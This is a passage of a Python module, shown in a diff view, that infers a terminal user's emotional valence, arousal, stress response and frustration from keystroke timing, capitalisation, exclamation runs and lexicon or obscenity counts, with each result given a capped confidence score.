Skip emission below ``VALENCE_MIN_TYPED_CHARS`` (80) typed letters.
|
||||||
|
Confidence hard-capped at 0.50 (registry convention); 0.30 below
|
||||||
|
``VALENCE_FULL_CONFIDENCE_MIN`` (200).
|
||||||
|
"""
|
||||||
|
if ctx.typed_letter_count < VALENCE_MIN_TYPED_CHARS:
|
||||||
|
return
|
||||||
|
pos = ctx.positive_lex_hits
|
||||||
|
neg_total = ctx.negative_lex_hits + ctx.obscenity_hits
|
||||||
|
if pos > neg_total and pos >= VALENCE_MIN_HITS:
|
||||||
|
value = "positive"
|
||||||
|
elif neg_total > pos and neg_total >= VALENCE_MIN_HITS:
|
||||||
|
value = "negative"
|
||||||
|
else:
|
||||||
|
value = "neutral"
|
||||||
|
raw = 0.50 if ctx.typed_letter_count >= VALENCE_FULL_CONFIDENCE_MIN else 0.30
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="emotional_valence.valence",
|
||||||
|
value=value,
|
||||||
|
confidence=_cap_soft(raw),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def arousal(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
|
||||||
|
high_agitated}.
|
||||||
|
|
||||||
|
Three signals (any of which fires ``high_agitated``):
|
||||||
|
|
||||||
|
* ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` (5) — capslock rant.
|
||||||
|
* ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` (3) — repeated bangs.
|
||||||
|
* The fastest typing burst's median IAT < ``AROUSAL_FAST_IAT_S``
|
||||||
|
(0.06) over a burst of ≥ ``AROUSAL_MIN_IATS`` (30) IATs.
|
||||||
|
|
||||||
|
``low_calm`` — slowest qualifying burst's median IAT >
|
||||||
|
``AROUSAL_CALM_IAT_S`` (0.30).
|
||||||
|
|
||||||
|
``medium_engaged`` — fall-through.
|
||||||
|
|
||||||
|
Skip emission when no qualifying typing bursts. Confidence hard-
|
||||||
|
capped at 0.50; 0.30 below ``AROUSAL_MIN_IATS`` total typed IATs.
|
||||||
|
"""
|
||||||
|
qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
|
||||||
|
if not qualifying:
|
||||||
|
return
|
||||||
|
fastest_med = min(statistics.median(b) for b in qualifying)
|
||||||
|
slowest_med = max(statistics.median(b) for b in qualifying)
|
||||||
|
total_iats = sum(len(b) for b in qualifying)
|
||||||
|
|
||||||
|
if (
|
||||||
|
ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
|
||||||
|
or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
|
||||||
|
or (
|
||||||
|
total_iats >= AROUSAL_MIN_IATS
|
||||||
|
and fastest_med < AROUSAL_FAST_IAT_S
|
||||||
|
)
|
||||||
|
):
|
||||||
|
value = "high_agitated"
|
||||||
|
elif total_iats >= AROUSAL_MIN_IATS and slowest_med > AROUSAL_CALM_IAT_S:
|
||||||
|
value = "low_calm"
|
||||||
|
else:
|
||||||
|
value = "medium_engaged"
|
||||||
|
raw = 0.50 if total_iats >= AROUSAL_MIN_IATS else 0.30
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="emotional_valence.arousal",
|
||||||
|
value=value,
|
||||||
|
confidence=_cap_soft(raw),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def stress_response(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``emotional_valence.stress_response`` ∈ {none,
|
||||||
|
eustress_positive, distress_negative}.
|
||||||
|
|
||||||
|
Compare typing speed *after* an errored command vs the session
|
||||||
|
baseline:
|
||||||
|
|
||||||
|
* For each errored command at index ``i``, gather
|
||||||
|
``ctx.intra_command_iats[i+1]`` — the response command's intra-
|
||||||
|
command IATs.
|
||||||
|
* Baseline: median of all intra-command IATs from commands NOT
|
||||||
|
immediately following an errored command.
|
||||||
|
|
||||||
|
Verdict by ratio of post-error / baseline:
|
||||||
|
|
||||||
|
* ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` (1.20) → ``eustress_positive``
|
||||||
|
(slowed down — recovered, deliberate).
|
||||||
|
* ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
|
||||||
|
(sped up — anxious, mashing keys).
|
||||||
|
* otherwise → ``none``.
|
||||||
|
|
||||||
|
Skip emission when no commands. Confidence hard-capped at 0.50;
|
||||||
|
0.30 below ``STRESS_MIN_ERRORED_WITH_IATS`` (2) errored commands
|
||||||
|
with non-empty post-error IAT data.
|
||||||
|
"""
|
||||||
|
if not ctx.commands:
|
||||||
|
return
|
||||||
|
post_error_iats: list[float] = []
|
||||||
|
baseline_iats: list[float] = []
|
||||||
|
n = len(ctx.commands)
|
||||||
|
qualifying_errored = 0
|
||||||
|
for i, cmd in enumerate(ctx.commands):
|
||||||
|
is_post_error = i > 0 and ctx.commands[i - 1].errored
|
||||||
|
iats = list(ctx.intra_command_iats[i]) if i < len(ctx.intra_command_iats) else []
|
||||||
|
if is_post_error:
|
||||||
|
if iats:
|
||||||
|
qualifying_errored += 1
|
||||||
|
post_error_iats.extend(iats)
|
||||||
|
else:
|
||||||
|
baseline_iats.extend(iats)
|
||||||
|
# mypy: silence unused-var on n / cmd (kept for clarity)
|
||||||
|
_ = (n, cmd)
|
||||||
|
if not post_error_iats or not baseline_iats:
|
||||||
|
value = "none"
|
||||||
|
else:
|
||||||
|
med_post = statistics.median(post_error_iats)
|
||||||
|
med_base = statistics.median(baseline_iats)
|
||||||
|
if med_base <= 0.0:
|
||||||
|
value = "none"
|
||||||
|
else:
|
||||||
|
ratio = med_post / med_base
|
||||||
|
if ratio >= STRESS_EUSTRESS_RATIO_MIN:
|
||||||
|
value = "eustress_positive"
|
||||||
|
elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
|
||||||
|
value = "distress_negative"
|
||||||
|
else:
|
||||||
|
value = "none"
|
||||||
|
raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="emotional_valence.stress_response",
|
||||||
|
value=value,
|
||||||
|
confidence=_cap_soft(raw),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
|
||||||
|
"""Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.
|
||||||
|
|
||||||
|
Pure read of ``ctx.obscenity_hits`` (G.0 lexical counter):
|
||||||
|
|
||||||
|
* ``detected`` — ``obscenity_hits ≥ 1``.
|
||||||
|
* ``none`` — zero hits.
|
||||||
|
|
||||||
|
Skip emission below ``FRUST_VENT_MIN_TYPED_CHARS`` (30) typed
|
||||||
|
letters — too thin to call cleanly absent. Confidence hard-capped
|
||||||
|
at 0.50; 0.40 when ``detected``; 0.50 only when ``none`` AND
|
||||||
|
typed_letter_count ≥ ``FRUST_VENT_FULL_CONFIDENCE_MIN`` (200);
|
||||||
|
0.30 otherwise.
|
||||||
|
"""
|
||||||
|
if ctx.typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
|
||||||
|
return
|
||||||
|
if ctx.obscenity_hits >= 1:
|
||||||
|
value = "detected"
|
||||||
|
raw = 0.40
|
||||||
|
else:
|
||||||
|
value = "none"
|
||||||
|
if ctx.typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
|
||||||
|
raw = 0.50
|
||||||
|
else:
|
||||||
|
raw = 0.30
|
||||||
|
yield make_observation(
|
||||||
|
ctx,
|
||||||
|
primitive="emotional_valence.frustration_venting",
|
||||||
|
value=value,
|
||||||
|
confidence=_cap_soft(raw),
|
||||||
|
)
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user